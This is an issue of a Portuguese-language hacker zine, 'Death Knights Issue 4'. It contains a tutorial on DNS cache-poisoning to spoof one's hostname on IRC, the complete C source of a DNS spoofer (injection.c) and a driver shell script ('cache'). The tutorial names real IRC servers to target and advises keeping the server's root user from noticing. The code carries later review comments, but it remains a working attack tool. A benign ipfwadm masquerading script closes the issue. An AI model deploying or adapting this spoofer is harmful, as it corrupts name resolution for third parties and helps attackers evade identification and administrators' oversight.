Injection Spoof
Death Knights Issue 4
by James007
Bem, eh a primeira vez que escrevo para a TDK, e resolvi escrever sobre esse assunto, vamos dizer... interessante......
Vou comecar explicando como spoofar usando 2 maquinas (mais seguro, pois voce nao vai precisar deixar o named killado na maquina principal ;)
Primeiro, voce deve considerar que voce precisa de 2 maquinas em uma rede, as duas sendo Linux (nao pode ser outro UNIX), sendo que uma precisa ser NS primario com authoritative answer...
Comecando....
Vamos dizer que vc tenha root na maquina netgo3.netgo.com.br, que eh NS primario com nameserver authoritative.. e que voce tenha root na james007.netgo.com.br que *nao* eh nameserver.... vc vai na netgo3.netgo.com.br e indica a james007.netgo.com.br no named sendo nameserver... exemplo:
netgo3 IN NS james007.netgo.com.br
ai vc killa o named dessa maquina ( netgo3.netgo.com.br ) e executa denovo. Agora voce loga como root na james007.netgo.com.br e killa o named dela se tiver rodando named.. ai.. vc vai mandar o injection.c ( q jah vem nessa edicao da TDK ) para a james007.netgo.com.br e compile....
Depois de compilado, execute o injection com a seguinte sintaxe:
./injection senha > /dev/null 2> /dev/null &
Agora, voce vai pegar um shell script, q jah vem nessa edicao, chamado cache, e vai editar ele...
Edite as seguintes linhas:
PASSWORD=senha
INJ_SERVER=maquina.que.roda.o.injection
SPOOF_SERVER=maquina.que.da.ns.ao.injection
No "PASSWORD=" coloque a senha que vc escolheu ..
no "INJ_SERVER=" coloca a host da maquina q roda o injection e no "SPOOF_SERVER=" voce coloca a host da maquina q da NS ao injection
agora tah prontinho ..
O cache fica na sua maquina ai vc executa ele assim:
cache seu-ip seu-ip-spoofado irc.servidor-onde-vc-quer-spoofar.com.br
e prontow ..
;)
Agora vou explicar usando soh uma maquina, que no caso precisa ser NS primario com authoritative answer ..
Voce loga como root nessa maquina.... kille o named.. e execute o injection com os mesmos parametros...
ai na hora de configurar o cache, vc coloca no INJ_SERVER e no SPOOF_SERVER a mesma host.. e tah valendo..... ;)
Ai eh soh executa o cache na sua maquina da mesma forma.. simples naum?! ;)
soh tem um problema.. nao eh bom ficar killando o named, rodando o injection, depois killar o injection, e rodar o named.... o root pode perceber.. alem do mais.. pode dar pau nas hosts da provedora.. por isso.... tome cuidado com o q faz.... ;)
Eh isso ai... tah ai... pra mim eh a forma mais facil de spoofar...
eu particularmente nao gosto de programas do tipo jizz, e da familia.. ;)
Eh isso ai d00z! tah ai.. agora eh soh vc arranjar uma NS primario q tenha authoritative answer e enjoy..
ah.. jah ia me eskecendo da lista de servers q da pra spoofar...
Vou colocar soh servers da brasirc.. nao vou falar nenhum da brasnet nem rede brasil:
irc.eribeiro.com.br
irc.sercomtel.com.br
irc.summer.com.br
Eh.. tah bom. chega.. ;)
OBS: O injection.c e o script cache vem anexos a este zine.
James007 James@DeathKnights.com
`'`'`'`' `'`'`'`'`'`'`'`'`'`'`'
injection.c
/*
injection.c DNS spoofer by savage@apostols.org 30/May/1997
based on jizz.c by teak@ib6ub9.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <strings.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <signal.h>
#define MAXBUFSIZE 64*1024 /* size of the receive, send and decoded-name buffers; not parenthesised, so only use it as a bare argument */
#define DEFAULT_TTL 60*5 /* 300 s: TTL stamped by dnstxt2rr on records whose text line carries none */
/* RR TYPE codes from RFC 1035 section 3.2.2.  dnstxt2rr only produces A, NS, CNAME, PTR and MX; the rest are unused here. */
#define DC_A 1
#define DC_NS 2
#define DC_CNAME 5
#define DC_SOA 6
#define DC_WKS 11
#define DC_PTR 12
#define DC_HINFO 13
#define DC_MINFO 14
#define DC_MX 15
#define DC_TXT 16
/* DNS message header (RFC 1035 section 4.1.1) kept in wire form: id and the
   four counts are stored already in network byte order and dnsmakerawpacket
   memcpy's the whole struct verbatim into the packet.  The flag bit-fields
   are declared least-significant-bit first within each byte (rd is bit 0 of
   the first flag byte, rcode the low nibble of the second); that matches the
   wire layout only where the compiler allocates bit-fields LSB-first, which
   the C standard leaves implementation-defined. */
typedef struct
{
unsigned short id; /* copied verbatim from the query by main so the reply matches */
unsigned char rd:1; /* recursion desired */
unsigned char tc:1; /* truncated message */
unsigned char aa:1; /* authoritive answer */
unsigned char opcode:4; /* purpose of message */
unsigned char qr:1; /* response flag */
unsigned char rcode:4; /* response code */
unsigned char unused:2; /* unused bits */
unsigned char pr:1; /* primary server required (non standard) */
unsigned char ra:1; /* recursion available */
unsigned short qdcount; /* question count, network order */
unsigned short ancount; /* answer count, network order */
unsigned short nscount; /* authority count, network order */
unsigned short arcount; /* additional count, network order */
}
dnsheaderrec;
/* One resource record in the form the serializer writes out: label holds the
   owner name already encoded as DNS wire labels (labellen bytes), type, class
   and ttl are in network byte order, and buf holds buflen bytes of RDATA
   (A: 4 address bytes; CNAME/NS/PTR: an encoded name; MX: 16-bit preference
   followed by an encoded name).  Both arrays are fixed at 256 bytes and are
   filled by dnsaddlabel without any bound check.  ttl is an unsigned long but
   dnsmakerawpacket copies only 4 bytes of it. */
typedef struct
{
unsigned short labellen; /* bytes used in label[] */
char label[256]; /* owner name, wire-encoded */
unsigned short type; /* DC_* value, network order */
unsigned short class; /* always htons(1) (IN) as built by dnstxt2rr */
unsigned long ttl; /* network order; first 4 bytes in memory are serialized */
unsigned short buflen; /* bytes used in buf[] (RDLENGTH, host order here) */
char buf[256]; /* RDATA */
}
dnsrrrec;
/* A whole message as built by dnsbuildpacket: header plus up to 20 records in
   each of the question (qd), answer (an), authority (ns) and additional (ar)
   sections.  The 20-entry capacity is not enforced anywhere; dnsbuildpacket
   trusts the counts it is given. */
typedef struct
{
dnsheaderrec h;
dnsrrrec qd[20]; /* question section */
dnsrrrec an[20]; /* answer section */
dnsrrrec ns[20]; /* authority section */
dnsrrrec ar[20]; /* additional section */
}
dnsrec;
/* Forward declarations for the helpers below.  rev_long has no prototype
   here, so its call in main goes through default argument promotion. */
char *dnssprintflabel (char *s, char *buf, char *p); /* wire name at p (inside packet buf) -> dotted text in s */
char *dnsaddlabel (char *p, char *label); /* dotted text -> wire labels at p */
void dnstxt2rr (dnsrrrec * rr, char *b); /* zone-file style text line -> dnsrrrec */
void dnsbuildpacket (dnsrec * dns, short qdcount, short ancount, short nscount, short arcount,...); /* fill a dnsrec from text lines passed as varargs */
char *dnsaddbuf (char *p, void *buf, short len); /* raw append, returns advanced cursor */
int dnsmakerawpacket (dnsrec * dns, char *buf); /* dnsrec -> wire bytes, returns length */
unsigned long default_ttl; /* TTL used by dnstxt2rr when the text line carries none; main sets it to DEFAULT_TTL */
/* Reverse the byte order of l over the full width of an unsigned long
   (sizeof (unsigned long) bytes, not a fixed four).  main feeds it the
   in_addr_t from inet_addr() to form the reversed dotted quad of the
   IN-ADDR.ARPA name; with a 32-bit unsigned long that is exactly the octet
   reversal wanted, whereas with a 64-bit unsigned long the four reversed
   octets end up in the upper half of the result.  No prototype precedes the
   call in main, so the argument's width there is whatever default promotion
   produces.  Pure function: no side effects. */
unsigned long
rev_long (l)
     unsigned long l;
{
  unsigned long reversed = 0;
  unsigned k;

  for (k = 0; k < sizeof reversed; k++)
    {
      /* pull the current low byte of l onto the low end of the result */
      reversed = (reversed << 8) | (l & 0xFFUL);
      l >>= 8;
    }
  return reversed;
}
/* Expand the wire-encoded name at p (inside the packet that starts at buf)
   into dotted text at s, following RFC 1035 compression pointers.  Every
   label is followed by '.', so a non-empty result ends in a dot; an empty
   (root) name yields "".  Returns the packet position just after the name:
   after the terminating zero byte when no pointer was followed, otherwise
   two bytes past the first pointer encountered (b remembers that spot).
   Review notes (defects left as found):
   - no bounds checking: s, p and the pointer targets computed from buf are
     never compared against the packet length or the size of s, so a
     malformed or hostile packet reads and writes out of bounds.
   - no hop limit on compression pointers: a pointer that leads back to
     itself loops forever and hangs the listener.
   - len is built from a plain char: where char is signed (x86 glibc) any
     length byte >= 0x80 becomes >= 0xFF80 after the cast and is treated as
     a pointer, not only the 0xC0-0xFF range the RFC reserves.
   - *(unsigned short *)(p - 1) is an unaligned, type-punned read. */
char *
dnssprintflabel (char *s, char *buf, char *p)
{
unsigned short i, len;
char *b = NULL; /* packet position to return once a pointer has been followed */
len = (unsigned short) *(p++);
while (len)
{
while (len >= 0xC0) /* 11xxxxxx: pointer to a name earlier in the packet */
{
if (!b)
b = p + 1; /* only the first pointer decides the return value */
p = buf + (ntohs (*((unsigned short *) (p - 1))) & ~0xC000); /* 14-bit offset from packet start */
len = (unsigned short) *(p++);
}
for (i = 0; i < len; i++)
*(s++) = *(p++);
*(s++) = '.';
len = (unsigned short) *(p++);
}
*(s++) = 0;
if (b)
return (b);
return (p);
}
/* Encode a dotted name as DNS wire labels (<len><bytes>... ending in a zero
   length byte) at p and return the cursor just past the terminator.  A single
   trailing dot is absorbed; an empty input produces only the terminator; an
   empty label ("a..b") is emitted as a zero-length label.  No bound is checked
   on p, and a label longer than 255 bytes does not fit its one-byte length
   prefix -- callers are trusted to pass sane input. */
char *
dnsaddlabel (char *p, char *label)
{
  char *out = p;

  for (;;)
    {
      char *dot;
      int seglen;

      if (*label == '\0')
        break;
      /* "foo." -- the final dot carries no label of its own */
      if (*label == '.' && label[1] == '\0')
        break;

      dot = strchr (label, '.');
      if (dot == NULL)
        dot = strchr (label, '\0');
      seglen = dot - label;

      *out++ = (char) seglen;
      memcpy (out, label, seglen);
      out += seglen;

      /* step over the dot if there was one, otherwise we are at the end */
      label = (*dot == '.') ? dot + 1 : dot;
    }
  *out++ = '\0';
  return out;
}
/* Parse one zone-file style text line into *rr.
   Accepted shape: "<owner> [ttl] [IN] <TYPE> [<rdata>]" with TYPE one of
   A, CNAME, NS, PTR, MX (MX rdata is "<preference> <exchange>").  On return
   label/labellen hold the wire-encoded owner name, ttl/class/type are in
   network order (class is always IN), and buf/buflen hold the RDATA; a
   missing rdata gives buflen 0.
   Review notes (defects left as found):
   - b is strcpy'd into a 1024-byte static buffer with no length check, and
     tok[] holds 20 entries with no check on numt.
   - tok[i] is read without checking i < numt: the question text main
     passes ("<name> IN") has two tokens, so the TYPE comparisons below read
     an unset tok[2].  A line with no tokens leaves tok[0] NULL, which
     dnsaddlabel then dereferences.
   - an unrecognised TYPE returns without setting type or buflen, leaving
     whatever the record held before.
   - isdigit and inet_aton are used without <ctype.h>/<arpa/inet.h>, so
     they are implicitly declared; inet_aton is handed a char * where it
     expects a struct in_addr *.
   - strtok and the static buffer make this non-reentrant. */
void
dnstxt2rr (dnsrrrec * rr, char *b)
{
char *tok[20], *p;
unsigned short numt = 0, i;
static char *buf = NULL; /* allocated on first call, never freed */
if (!buf)
{
if ((buf = malloc (1024)) == NULL)
{
perror ("malloc");
exit (-1);
}
}
strcpy (buf, b);
p = strtok (buf, " \t");
do
{
tok[numt++] = p;
}
while (p = strtok (NULL, " \t"));
p = dnsaddlabel (rr->label, tok[0]); /* owner name -> wire labels */
rr->labellen = p - rr->label;
i = 1;
if (isdigit (*tok[i])) /* optional numeric TTL */
rr->ttl = htonl (atol (tok[i++]));
else
rr->ttl = htonl (default_ttl);
if (strcmp (tok[i], "IN") == 0) /* optional class keyword; class is IN regardless */
i++;
rr->class = htons (1);
if (strcmp (tok[i], "A") == 0)
{
i++;
rr->type = htons (DC_A);
if (i < numt)
{
inet_aton (tok[i], rr->buf); /* 4 address bytes, network order, straight into RDATA */
rr->buflen = 4;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "CNAME") == 0)
{
i++;
rr->type = htons (DC_CNAME);
if (i < numt)
{
p = dnsaddlabel (rr->buf, tok[i]); /* RDATA is an encoded name */
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "NS") == 0)
{
i++;
rr->type = htons (DC_NS);
if (i < numt)
{
p = dnsaddlabel (rr->buf, tok[i]);
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "PTR") == 0)
{
i++;
rr->type = htons (DC_PTR);
if (i < numt)
{
p = dnsaddlabel (rr->buf, tok[i]);
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
if (strcmp (tok[i], "MX") == 0)
{
i++;
rr->type = htons (DC_MX);
if (i < numt)
{
p = rr->buf;
*((unsigned short *) p) = htons (atoi (tok[i++])); /* 16-bit preference first */
p += 2;
p = dnsaddlabel (p, tok[i]); /* exchange name; tok[i] not checked against numt */
rr->buflen = p - rr->buf;
}
else
rr->buflen = 0;
return;
}
/* unknown TYPE: fall out without touching type or buflen */
}
/* Fill dns from text lines: the header counts are set (network order) and
   rcode cleared, then exactly qdcount + ancount + nscount + arcount char *
   arguments are consumed from the varargs in wire order (QD, AN, NS, AR)
   and each is parsed by dnstxt2rr into the matching section slot.  Nothing
   else in the header is touched, and the 20-slot section capacity is not
   checked against the counts.  Note that va_start on a short parameter is
   undefined by C11 7.16.1.4 (the type changes under default promotion); it
   works on the usual ABIs but is worth knowing. */
void
dnsbuildpacket (dnsrec * dns, short qdcount, short ancount, short nscount, short arcount,...)
{
  dnsrrrec *section[4];
  short count[4];
  va_list va;
  int s, k;

  /* wire order of the sections, which is also the order of the varargs */
  section[0] = dns->qd; count[0] = qdcount;
  section[1] = dns->an; count[1] = ancount;
  section[2] = dns->ns; count[2] = nscount;
  section[3] = dns->ar; count[3] = arcount;

  dns->h.qdcount = htons (qdcount);
  dns->h.ancount = htons (ancount);
  dns->h.nscount = htons (nscount);
  dns->h.arcount = htons (arcount);
  dns->h.rcode = 0;

  va_start (va, arcount);
  for (s = 0; s < 4; s++)
    for (k = 0; k < count[s]; k++)
      dnstxt2rr (&section[s][k], va_arg (va, char *));
  va_end (va);
}
/* Append len raw bytes from buf at p and return the cursor just past them.
   No destination bound is checked, and a negative len would be converted to
   a huge size_t by memcpy, so callers must pass 0..SHRT_MAX. */
char *
dnsaddbuf (char *p, void *buf, short len)
{
  char *next = p + len;

  memcpy (p, buf, len);
  return next;
}
/* Serialise one resource record in wire order (owner name, TYPE, CLASS, TTL,
   RDLENGTH, RDATA) at p and return the cursor past it.  Shared by the answer,
   authority and additional sections.  TYPE, CLASS and TTL are already in
   network order inside the record; only RDLENGTH is converted here.  Four
   bytes are copied from ttl whatever sizeof (unsigned long) is, i.e. the
   first four bytes of the field as laid out in memory. */
static char *
dns_put_rr (char *p, dnsrrrec * rr)
{
  unsigned short rdlength = htons (rr->buflen);

  p = dnsaddbuf (p, rr->label, rr->labellen);
  p = dnsaddbuf (p, &rr->type, 2);
  p = dnsaddbuf (p, &rr->class, 2);
  p = dnsaddbuf (p, &rr->ttl, 4);
  p = dnsaddbuf (p, &rdlength, 2);
  return dnsaddbuf (p, rr->buf, rr->buflen);
}

/* Write dns as a wire-format message into buf and return its length in
   bytes: the header struct verbatim, then the question entries (name, TYPE,
   CLASS) and the three RR sections, as many of each as the header counts
   say.  No bound on buf is checked; main hands it a MAXBUFSIZE buffer. */
int
dnsmakerawpacket (dnsrec * dns, char *buf)
{
  char *cursor;
  int i, n;

  memcpy (buf, &dns->h, sizeof (dnsheaderrec));
  cursor = buf + sizeof (dnsheaderrec);

  /* question section: no TTL or RDATA */
  n = ntohs (dns->h.qdcount);
  for (i = 0; i < n; i++)
    {
      cursor = dnsaddbuf (cursor, dns->qd[i].label, dns->qd[i].labellen);
      cursor = dnsaddbuf (cursor, &dns->qd[i].type, 2);
      cursor = dnsaddbuf (cursor, &dns->qd[i].class, 2);
    }

  /* answer section */
  n = ntohs (dns->h.ancount);
  for (i = 0; i < n; i++)
    cursor = dns_put_rr (cursor, &dns->an[i]);

  /* authority section */
  n = ntohs (dns->h.nscount);
  for (i = 0; i < n; i++)
    cursor = dns_put_rr (cursor, &dns->ns[i]);

  /* additional section */
  n = ntohs (dns->h.arcount);
  for (i = 0; i < n; i++)
    cursor = dns_put_rr (cursor, &dns->ar[i]);

  return cursor - buf;
}
#define BFSIZE 1024 /* size of each text-line buffer and of FAKEIP/FAKENAME/mybuff */
/* Entry point.  Binds UDP port 53 on every interface (a privileged port,
   which is why the article runs this as root with named stopped) and
   answers every query it receives with an authoritative reply (qr=1, aa=1,
   id copied from the query) built from these text lines:
     question : "<name> IN"                         (type copied from the query)
     answer   : "<name> 1 IN CNAME FAKENAME"
                "FAKENAME IN A FAKEIP"
                "<reversed FAKEIP>.IN-ADDR.ARPA IN PTR FAKENAME"
                "ns.FAKENAME IN A 6.6.6.6"
     authority: "FAKENAME IN NS ns.FAKENAME"
   Lines without an explicit TTL get DEFAULT_TTL.  FAKEIP/FAKENAME start at
   compiled-in defaults and are replaced at run time by a query whose name
   is "@<argv[1]>@<ip>@<name>"; the password and the new values therefore
   travel in cleartext inside an ordinary DNS query and are visible to
   anyone on the path or in the query logs.  A resolver that applies
   bailiwick/credibility checks drops the answer-section records for names
   other than the one it asked about, which is the standard mitigation
   against this kind of injected answer.
   Review notes (defects left as found):
   - main is declared void, and the usage printf has no argument for its %s.
   - mybuff is BFSIZE bytes but is strcpy'd from domainnamebuf, which holds
     a name decoded from a MAXBUFSIZE packet: a long query name overflows
     the stack array.  numread is never compared with sizeof (dnsheaderrec)
     and dnssprintflabel has no bounds checks, so a short or malformed
     packet is read past the data received.
   - dnsh is never zeroed, so header bits main does not set (rd, tc, opcode,
     ra, pr, unused) go out as whatever was on the stack.
   - fromlen is an int where recvfrom expects socklen_t *; inet_addr and
     inet_ntoa are implicitly declared (<arpa/inet.h> is not included), so
     inet_ntoa is handed rev.s_addr instead of rev without complaint and its
     char * result is truncated through an int return on 64-bit builds.
   - beginhost_srch, spoofedip_rev and pid_named are never read; none of the
     eleven malloc'd buffers is freed; the loop runs until the process is
     killed. */
void
main (int argc, char *argv[])
{
int sock, fromlen, numread, len, query;
struct sockaddr_in sa, from, to;
struct in_addr rev;
char *buf, *sendbuf;
char *domainnamebuf;
dnsheaderrec *dns;
char *p;
dnsrec dnsh; /* reused for every reply; never memset */
char *beginhost_QD, *beginhost_A, *beginhost_srch;
char *fakenshost_A, *fakens_DOM;
char *spoofedip_A, *spoofedip_PTR, *spoofedip_rev;
char *pid_named; /* unused */
char FAKEIP[BFSIZE] = "194.179.44.64", FAKENAME[BFSIZE] = "The.Lammerz.Houze"; /* defaults until a control query arrives */
char mybuff[BFSIZE], *bp = NULL;
if (argc < 2)
{
printf ("usage: \n%s <password>\n"); /* %s has no matching argument */
exit (-1);
}
if ((beginhost_QD = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((beginhost_A = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((beginhost_srch = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((fakenshost_A = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((fakens_DOM = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((spoofedip_A = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((spoofedip_PTR = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((spoofedip_rev = malloc (BFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((buf = malloc (MAXBUFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((sendbuf = malloc (MAXBUFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((domainnamebuf = malloc (MAXBUFSIZE)) == NULL)
{
perror ("malloc");
exit (-1);
}
if ((sock = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
{
perror ("socket");
exit (-1);
}
sa.sin_family = AF_INET;
/* sa.sin_addr.s_addr = inet_addr(DEFAULTBINDHOST); */
sa.sin_addr.s_addr = INADDR_ANY; /* all interfaces; fails if another name server holds the port */
sa.sin_port = htons (53);
if (bind (sock, (struct sockaddr *) &sa, sizeof (sa)) < 0)
{
perror ("bind");
exit (-1);
}
setvbuf (stdout, NULL, _IONBF, 0); /* unbuffered log lines even when redirected */
while (1)
{
fromlen = sizeof (from);
if ((numread = recvfrom (sock, buf, MAXBUFSIZE, 0, (struct sockaddr *) &from, &fromlen)) < 0)
{
perror ("recvfrom");
continue;
}
/* Kludge to stop that damn router */
/* hard-coded source address the author wanted ignored */
if (from.sin_addr.s_addr == inet_addr ("194.179.44.2"))
continue;
dns = (dnsheaderrec *) buf;
if (dns->qr) /* ignore responses, only answer queries */
continue;
/* decode the first question's name; p then points at its TYPE field */
p = dnssprintflabel (domainnamebuf, buf, &buf[sizeof (dnsheaderrec)]);
query = ntohs (*(unsigned short *) p);
strcpy (mybuff, domainnamebuf); /* unbounded copy into a BFSIZE stack array */
bp = strtok (mybuff, "@");
/* control message: name "@<password>@<ip>@<name>" with password == argv[1] */
if (bp && *domainnamebuf == '@' && !strcmp (argv[1], bp))
{
bp = strtok (NULL, "@");
if (bp)
strncpy (FAKEIP, bp, BFSIZE - 1);
bp = strtok (NULL, "@");
if (bp)
strncpy (FAKENAME, bp, BFSIZE - 1);
printf ("FakeIP: %s FakeNAME: %s\n", FAKEIP, FAKENAME);
}
strcpy (beginhost_srch, "."); /* written but never read */
/* text lines for the forged record set; rebuilt on every query */
snprintf (fakenshost_A, BFSIZE - 1, "ns.%s IN A 6.6.6.6", FAKENAME);
snprintf (fakens_DOM, BFSIZE - 1, "%s IN NS ns.%s", FAKENAME, FAKENAME);
snprintf (spoofedip_A, BFSIZE - 1, "%s IN A %s", FAKENAME, FAKEIP);
rev.s_addr = rev_long (inet_addr (FAKEIP)); /* octet-reversed address for the PTR owner name */
snprintf (spoofedip_PTR, BFSIZE - 1, "%s.IN-ADDR.ARPA IN PTR %s", (char *) inet_ntoa (rev.s_addr), FAKENAME);
default_ttl = DEFAULT_TTL;
printf ("from %s : %d : '%s' (%d)\n", inet_ntoa (from.sin_addr), ntohs (from.sin_port), domainnamebuf, query);
snprintf (beginhost_QD, BFSIZE - 1, "%s IN", domainnamebuf);
snprintf (beginhost_A, BFSIZE - 1, "%s 1 IN CNAME %s", domainnamebuf, FAKENAME);
/* 1 question, 4 answers, 1 authority, 0 additional */
dnsbuildpacket (&dnsh, 1, 4, 1, 0,
beginhost_QD,
beginhost_A,
spoofedip_A,
spoofedip_PTR,
fakenshost_A,
fakens_DOM);
dnsh.qd[0].type = htons (query); /* echo the queried TYPE */
dnsh.h.id = ((dnsheaderrec *) buf)->id; /* match the query's transaction id */
dnsh.h.qr = 1;
dnsh.h.aa = 1;
len = dnsmakerawpacket (&dnsh, sendbuf);
/* reply to whoever asked, same address and port */
to.sin_family = AF_INET;
to.sin_addr.s_addr = from.sin_addr.s_addr;
to.sin_port = from.sin_port;
if (sendto (sock, sendbuf, len, 0, (struct sockaddr *) &to, sizeof (to)) < 0)
{
perror ("sendto");
continue;
}
}
}
cache
#!/bin/sh
#
# script to Spoof hostname based on |savage|'s injection and dns
#
# usage: cache <ip> <host> <ns to cache on>
#   $1  IP address that should end up mapping to <host>
#   $2  host name to associate with <ip>
#   $3  name server whose cache is exercised and then queried back
# Review notes: the shebang is /bin/sh but $RANDOM below is a bash/ksh
# feature, and `expr length` / `expr substr` are GNU expr extensions.  The
# colour strings show no ESC (0x1b) byte in this copy -- most likely lost in
# extraction; as written they print literally.  No nslookup exit status is
# checked and all of their output is discarded.
# colors
F_RESET="[0m"
F_BLACK="[0;30m"
F_GREEN="[0;32m"
F_BLUE="[0;34m"
F_MAGENTA="[0;35m"
F_WHITE="[0;37m"
H_BLACK="[1;30m"
H_GREEN="[1;32m"
H_BLUE="[1;34m"
H_MAGENTA="[1;35m"
H_WHITE="[1;37m"
PASSWORD=senha # must equal the argv[1] given to injection; sent in cleartext inside a DNS query name
INJ_SERVER=maquina.que.roda.o.injection # host running injection on UDP/53
SPOOF_SERVER=maquina.que.da.ns.ao.injection # name whose NS delegation points at INJ_SERVER (see the article)
spaces=" " # padding source for centring; holds a single space in this copy, so the centring is effectively lost
draw=$H_BLACK"o"$F_WHITE"O"$H_WHITE"o"$F_RESET # decorative "oOo" brackets
draw2=$H_WHITE"o"$F_WHITE"O"$H_BLACK"o"$F_RESET
if [ $# -ne '3' ]; then
echo "usage: cache <ip> <host> <ns to cache on>"
exit # exits with status 0 even on bad usage
fi
# setting
# step 1: hand injection the ip/host pair to answer with.  The whole control
# message is the query name "@<password>@<ip>@<host>." sent to INJ_SERVER.
info=`echo "oO Setting [$2 IN A $1] Oo"`
n_spaces=`expr length "$info"` # centre the banner on an 80-column line
n_spaces=`expr 40 - \( $n_spaces / 2 \)`
info=$draw' setting '$H_BLACK'['$H_MAGENTA$2' '$F_MAGENTA'A '$H_MAGENTA$1$H_BLACK'] '$draw2
echo "`expr substr \"$spaces\" 1 $n_spaces`$info"
nslookup @$PASSWORD@$1@$2. $INJ_SERVER > /dev/null 2> /dev/null
# injection
# step 2: query $3 for a random, never-cached name under SPOOF_SERVER so that
# $3 has to fetch it and receives injection's forged answer set.
info=`echo "oOo Injection [$SPOOF_SERVER > $3] oOo"`
n_spaces=`expr length "$info"`
n_spaces=`expr 40 - \( $n_spaces / 2 \)`
info=$draw' injecting '$H_BLACK'['$H_GREEN$SPOOF_SERVER' '$F_GREEN'on '$H_GREEN$3$H_BLACK'] '$draw2
echo "`expr substr \"$spaces\" 1 $n_spaces`$info"
nslookup $RANDOM.$SPOOF_SERVER $3 > /dev/null 2> /dev/null
# testing
# step 3: ask $3 what name it now holds for $1 and display it.  The injected
# records expire with the TTL injection sent (DEFAULT_TTL, five minutes).
server=`nslookup $1 $3 2>/dev/null | grep Name | cut -d ":" -f2`
server=`echo $server` # unquoted echo collapses the surrounding whitespace
info=`echo "oOo Testing $1 is $server oOo"`
n_spaces=`expr length "$info"`
n_spaces=`expr 40 - \( $n_spaces / 2 \)`
info=$draw' testing '$H_BLACK'['$H_BLUE$1' '$F_BLUE'is '$H_BLUE$server$H_BLACK'] '$draw2
echo "`expr substr \"$spaces\" 1 $n_spaces`$info"
script
echo "Running Masquerade"
# The Death Knights
# http://www.deathknights.com
#
# Script originally written by BOZOH, with some modifications made by
# red_evil(red_evil@uground.org).
#
# Review notes: this fragment has no shebang line, so it runs under whatever
# shell invokes it.  ipfwadm is the pre-ipchains Linux firewall tool.  The
# rules first set a default-deny forwarding policy and then permit
# masquerading only for listed sources, which is the right default-deny
# shape; however the 192.168.1.0/24 rule already covers every /32 listed
# after it, so the per-host lines are redundant unless the /24 line is
# removed.  No command checks its exit status.
/sbin/ipfwadm -F -p deny # same as the previous line (not part of this fragment), but -p accept ( -p == policy ) would allow
# forwarding
/sbin/ipfwadm -F -a m -S 192.168.1.0/24 -D 0.0.0.0/0 # forwarding, add the
# masquerade rule (-a), only
# for these ip's (-S ),
# (-D ) destination (0.0.0.0
# means all ip's )
/sbin/ipfwadm -F -a m -S 192.168.1.1/32 -D 0.0.0.0/0
/sbin/ipfwadm -F -a m -S 192.168.1.2/32 -D 0.0.0.0/0
/sbin/ipfwadm -F -a m -S 192.168.1.3/32 -D 0.0.0.0/0
# .
# .
# .
# .
/sbin/ipfwadm -F -a m -S 192.168.1.254/32 -D 0.0.0.0/0
# only these hosts will be able to use
# masquerading
# -S parameter:
# your network's ip's. for example, if your network has ips 10.100.100.*, use
# 10.100.100.0 instead of 192.168.1.0.
echo "Modules ...."
# keep only the modules you actually use
/sbin/depmod -a
# obviously, these modules' names speak for themselves !!
/sbin/modprobe ip_masq_ftp
/sbin/modprobe ip_masq_irc
/sbin/modprobe ip_masq_raudio
/sbin/modprobe ip_masq_quake
/sbin/modprobe ip_masq_cuseeme
/sbin/modprobe ip_masq_vdolive
#
#
# --------------------------------------------